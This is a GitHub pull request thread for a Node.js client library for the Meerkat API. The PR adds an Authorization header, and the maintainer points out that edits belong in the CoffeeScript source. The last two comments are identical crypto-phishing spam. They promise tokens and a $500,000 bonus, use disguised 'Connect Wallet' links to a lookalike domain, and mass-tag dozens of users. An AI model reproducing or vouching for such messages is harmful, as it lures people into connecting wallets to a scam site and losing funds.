### PR TITLE
Authorization header

### PR DESCRIPTION
**Pull request by theChumpus**
Hi,

This is my first pull request so apologies if I do/say something dumb!

It seems Meerkat now requires the API_KEY to be present in the Authorization header of every API request so I was getting an error when making calls to the API:

```
SyntaxError: Unexpected token <
    at Object.parse (native)
    at Request._callback (/Users/Olly/Dev/meerkat/node_modules/node-meerkat/lib/index.js:15:21)
    at Request.self.callback (/Users/Olly/Dev/meerkat/node_modules/node-meerkat/node_modules/request/request.js:197:22)
    at Request.emit (events.js:98:17)
    at Request.<anonymous> (/Users/Olly/Dev/meerkat/node_modules/node-meerkat/node_modules/request/request.js:1050:14)
    at Request.emit (events.js:117:20)
    at IncomingMessage.<anonymous> (/Users/Olly/Dev/meerkat/node_modules/node-meerkat/node_modules/request/request.js:996:12)
    at IncomingMessage.emit (events.js:117:20)
    at _stream_readable.js:944:16
    at process._tickCallback (node.js:442:13)
```

I added the Authorization header to the __request object.

Hope this helps.

### CODE REVIEW

**Comment by mattnull** [comment]
FYI this module is written in coffeescript. All changes need to be made in /src directory or it will get blown away. I am updating the coffee files.

**Comment by theChumpus** [comment]
Ah, awesome. Thanks!

**Comment by sobin007** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
ZRDKPoWeR, @EuJinnLucaShow, @daijinru, @Sija, @1RO8s, @ScoutYin, @hpduong, @monaqvi, @Sonmezturk, @mvuk, @wulianonline, @samihamine, @Ruiannan, @zenkilies, @talesofthislife, @2n3g5c9, @gaybro8777, @MatthieuScarset, @vivonk, @donice, @JulesTan, @Hdbejftdfd282, @LijinPengT, @oceanking, @gaokaikai, @hasangenc0, @yarning233, @JmmBite, @Phy-ve, @jmarshalltech, @as3617, @myxvisual, @rock-you, @gityumin, @fundgao, @hcaihao, @travisbloom-cb, @SAINT-CHRIS, @zjz894251se, @fxxkscript, @Cratosw, @ds-jcaro, @rossdm, @helloHuangsir, @Huntemall, @Joel-Raju, @FabianPortillo1996, @JohnIdyu, @Elli3333, @remmusfrog

**Comment by vishalyadav98** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
sfmaple, @katanabe, @arata-artorias, @lencx, @cardeverre, @daboyyy, @murrayee, @erichocean, @rrreeeyyy, @YashKarthik, @JustinTW, @n370, @Codecwzz, @xcesiv, @BenTuTu, @yaelahan, @hamidrezasahraei, @Lerex, @floriansr, @dionannd, @assimovt, @h0rizons, @miguelmarcondesf, @koobraelc, @kmels, @BlagoSvet, @linkinzhiyuan, @GEEKSUMAN, @cdituri, @FelixCMD, @ihtml5, @eprdude, @szczepanbarszczowski, @guizzettic, @baldogarasd, @H0301ein, @sitleon, @ltixier2, @rodrigobustamante, @0478yhl, @ckwanted, @harlenoo, @RohitPatilRRP, @YTU94, @Holden-Lin, @EdgarHSalinas, @EliseTonight, @iconben, @alejagapatrick, @chZzZzZz

**Pull request merged**
